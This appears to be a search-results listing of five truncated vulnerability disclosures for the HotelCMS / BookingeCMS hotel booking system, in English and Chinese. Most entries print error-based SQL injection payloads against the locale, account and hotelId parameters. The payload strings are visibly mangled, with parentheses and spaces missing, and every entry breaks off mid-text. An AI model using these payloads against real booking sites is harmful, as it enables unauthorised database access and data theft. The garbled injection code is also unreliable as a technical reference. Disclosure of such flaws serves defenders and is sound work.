5 matches found
HotelCMS with Booking Engine - SQL injection vulnerability
http://localhost/PATH/locale? locale=SQL the locale parameter there is sql injection Wherein the error injection as follows: payload: http://localhost/PATH/locale? locale=1' AND SELECT 3507 FROMSELECT COUNT,CONCATFLOORRAND02,md5233x FROM INFORMATIONSCHEMA. The PLUGINS GROUP BY xa-- Lilt Test...
HotelCMS with Booking Engine - SQL Injection
Exploit Title: HotelCMS with Booking Engine - SQL Injection Google Dork: N/A Date: 10.02.2017 Vendor Homepage: http://codepaul.com/ Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671 Demo: http://codepaul.com/hotelcms/ Version: N/A Tested on: Win7 x64, Kali Linux x64...
HotelCMS with Booking Engine - SQL Injection
HotelCMS with Booking Engine - SQL Injection Exploit Title: HotelCMS with Booking Engine - SQL Injection Google Dork: N/A Date: 10.02.2017 Vendor Homepage: http://codepaul.com/ Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671 Demo: http://codepaul.com/hotelcms/...
BookingeCMS HotelCMS酒店预订管理系统account参数SQL注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=login.checkAccount&account= 文件account参数存在注入 0x02 漏洞利用 测试Payload: (get提交) /?m=login.checkAccount&account= /?m=login.checkAccount&account= ' AND SELECT 9468 FROMSELECT...
BookingeCMS HotelCMS酒店预订管理系统hotelId参数存在注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=hotel.getHotelInfo 文件hotelId参数存在注入 0x02 漏洞利用 测试Payload: (post提交) /?m=hotel.getHotelInfo hotelId=11 AND SELECT 6261 FROMSELECT COUNT,CONCAT0x7c,MIDIFNULLCASTDATABASE AS...